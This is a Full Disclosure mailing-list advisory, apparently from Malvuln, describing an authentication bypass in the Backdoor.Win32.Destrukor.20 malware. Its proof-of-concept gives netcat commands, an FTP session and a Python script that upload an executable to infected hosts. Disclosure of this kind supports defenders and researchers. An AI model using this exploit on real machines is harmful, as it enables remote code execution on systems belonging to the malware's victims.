[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Backdoor.Win32.Destrukor.20 / Authentication Bypass
From:       malvuln <malvuln13 () gmail ! com>
Date:       2022-07-31 1:12:49
Message-ID: CAAHK0WR=gFuy+nE+H9ZNmsh0aCkazuk51SUMor1Ltn0Sq0Z1QQ () mail ! gmail ! com
[Download RAW message or body]

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022
Original source:
https://malvuln.com/advisory/c790749f851d48e66e7d59cc2e451956.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Destrukor.20
Vulnerability: Authentication Bypass
Description: The malware listens on TCP port 6969. However, after sending a
specific cmd "rozmiar" the backdoor returns "moznasciagac" in Polish "you
can download" and port 21 opens. Third-party attackers who can reach
infected systems can logon using any username/password combination.
Intruders may then upload executables using ftp PASV, STOR commands, this
can result in remote code execution.
Family: Destrukor
Type: PE32
MD5: c790749f851d48e66e7d59cc2e451956
Dropped files: sys32.exe
Vuln ID: MVID-2022-0626
Disclosure: 07/30/2022

Exploit/PoC:
C:\>nc64.exe 192.168.18.125 6969
rozmiar
 moznasciagac

C:\>nc64.exe 192.168.18.125 21
220 ICS FTP Server ready.
USER malvuln
331 Password required for malvuln.
PASS malvuln
230 User malvuln logged in.
SYST
215 UNIX Type: L8 Internet Component Suite
CDUP \
250 CWD command successful. "C:/" is current directory.
MKD HATE
257 'C:\HATE': directory created.
PASV
227 Entering Passive Mode (192,168,18,125,232,131).
STOR DOOM.exe
150 Opening data connection for DOOM.exe.
226 File received ok

from socket import *

MALWARE_HOST="192.168.18.125"
PORT=59523
DOOM="DOOM.exe"

def doit():
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    f = open(DOOM, "rb")
    EXE = f.read()
    s.send(EXE)

    while EXE:
        s.send(EXE)
        EXE=f.read()

    s.close()

    print("By Malvuln");

if __name__=="__main__":
    doit()


Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic